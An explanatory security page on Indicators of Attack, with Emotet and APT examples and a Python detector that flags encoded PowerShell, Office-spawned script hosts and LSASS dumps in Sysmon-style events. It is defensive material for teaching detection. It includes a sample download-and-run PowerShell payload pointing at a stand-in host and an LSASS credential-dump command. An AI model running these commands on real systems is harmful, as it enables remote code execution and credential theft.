Indicators of Attack (IoA)
Indicators of Attack (IoAs) are behavioral signs that an attack is in progress or being attempted. Indicators of Compromise (IoCs) are artifacts such as file hashes, IP addresses, and domains that provide evidence after a breach has already occurred; IoAs instead concentrate on detecting the suspicious behaviors, tactics, and techniques attackers use, in real time.
IoAs help security teams identify malicious activity earlier in the attack lifecycle. Instead of searching for known malicious artifacts, IoAs monitor how attackers operate. This makes them particularly valuable against advanced persistent threats (APTs), fileless malware, insider threats, and zero-day attacks, none of which necessarily has a recognizable signature or hash.
Rather than depending on static indicators such as known malicious IP addresses or file hashes, IoAs evaluate abnormal or suspicious activity: attempts at privilege escalation, unusual command execution, lateral movement between systems, credential dumping, persistence techniques, or suspicious authentication behavior. The practical difference is what a detection rule keys on. A hash-based rule fires only for one known file; a behavior-based rule such as "an Office application spawned PowerShell with an encoded command" fires for every sample that behaves that way, including ones never seen before, at the cost of needing tuning against legitimate activity that looks similar.
Key Characteristics
- Proactive: Flags suspicious behavior as it happens rather than after the artifacts of a breach have been left behind, which aids in identifying attacks early in their lifecycle.
- Behavior-Anomaly Focus: Identifies unusual patterns of activity instead of relying solely on known malicious signatures or artifacts.
- Early Attack Detection: Allows security teams to respond while an attack is still ongoing, before the attacker reaches their objective, thereby minimizing potential damage.
- Based on Attacker Tactics, Techniques, and Procedures (TTPs): Concentrates on understanding how attackers operate rather than just the specific tools or files they employ, which change far more often than the underlying technique.
Examples
Each entry below gives the behavior, the threat it was observed with, and the observable that a detection rule would key on. Note that the SHA-256 hashes are IoCs for one specific Emotet sample; the IoA is the command line or process chain, which would still fire if the sample were recompiled to a different hash.
- PowerShell execution with encoded commands
  - Observed with: Emotet Downloader (SHA-256 ff76ff1440947e3dd42578f534b91fdb8229c1f40fed36a3dd5688dbc51f0014)
  - Observable: powershell.exe -w hidden -en JABBHoAe… (a hidden window plus a Base64-encoded command line)
- Suspicious execution chain
  - Observed with: Emotet Downloader (SHA-256 ff76ff1440947e3dd42578f534b91fdb8229c1f40fed36a3dd5688dbc51f0014)
  - Observable: winword.exe -> powershell.exe -> 937.exe (an Office application spawning PowerShell, which then launches a dropped executable)
- Privilege escalation
  - Observed with: Digital Eye (APT)
  - Observable: bK2o.exe used for pass-the-hash (similar to mimikatz), reusing a stolen NTLM hash to authenticate without the plaintext password
- Credential dumping
  - Observed with: FIN13 (APT)
  - Observable: procdump.exe -ma lsass.exe lsass.dmp (a full memory dump of LSASS, from which credentials can be extracted offline)
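The behaviors in the examples above are the kind of thing an IoA rule keys on. The following is an added example, not code from the original page: it runs three such rules (encoded PowerShell, an Office application spawning a script host, and an LSASS dump) over a handful of process-creation events constructed inline in the shape of Sysmon Event ID 1 fields. The event layout, rule names, sample command lines and paths are all assumptions made for this example.

```python
"""Added example (not from the original page): flag a few IoAs in process-creation events.

Events are constructed inline in the shape of Sysmon Event ID 1 fields
(ParentImage, Image, CommandLine). The rule names and sample data are
assumptions made for this example.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the newly created process
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_powershell(command_line: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None.
    -EncodedCommand is Base64 over UTF-16LE, so a successful UTF-16LE decode is the check."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def findings_for(ev: ProcessEvent) -> list[str]:
    """Names of the IoA rules that fire for one process-creation event."""
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    hits = []
    # IoA 1: PowerShell launched with an encoded command; a hidden window is an extra signal.
    if image in POWERSHELL and decode_encoded_powershell(cmd) is not None:
        hits.append("encoded_powershell_hidden" if HIDDEN_WINDOW.search(cmd) else "encoded_powershell")
    # IoA 2: an Office application spawning a script host (typical macro behavior).
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # IoA 3: LSASS memory being dumped, via procdump -ma lsass.exe or rundll32 comsvcs.dll MiniDump.
    lower = cmd.lower()
    if "lsass" in lower and (image in {"procdump.exe", "procdump64.exe"}
                             or (image == "rundll32.exe" and "comsvcs" in lower and "minidump" in lower)):
        hits.append("lsass_dump")
    return hits


def scan(events):
    """Return (rule, event) pairs for every rule that fires across the events."""
    return [(rule, ev) for ev in events for rule in findings_for(ev)]


# Constructed sample data: an Emotet-style maldoc chain, an LSASS dump and some benign noise.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED_B64 = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii")
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD_PATH = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", WORD_PATH, '"WINWORD.EXE" /n "C:\\Users\\bob\\Downloads\\invoice.docm"'),
    ProcessEvent(WORD_PATH, PS_PATH, f"powershell.exe -w hidden -en {ENCODED_B64}"),
    ProcessEvent(PS_PATH, r"C:\Users\Public\937.exe", r"C:\Users\Public\937.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Tools\procdump.exe", "procdump.exe -ma lsass.exe lsass.dmp"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS_PATH, "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for rule, ev in scan(SAMPLE_EVENTS):
        print(f"{rule:28} {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line[:60]}")
```

Two things worth noticing when running it. The second event fires twice (encoded PowerShell and Office-to-PowerShell) while the benign Get-Date launch from explorer.exe fires nothing, which is the point of keying on behavior rather than on powershell.exe itself. The third event, PowerShell launching 937.exe, is not flagged: each event carries only its direct parent, so the full winword.exe -> powershell.exe -> 937.exe chain is visible only if events are correlated into a process tree, which a real detection pipeline has to do.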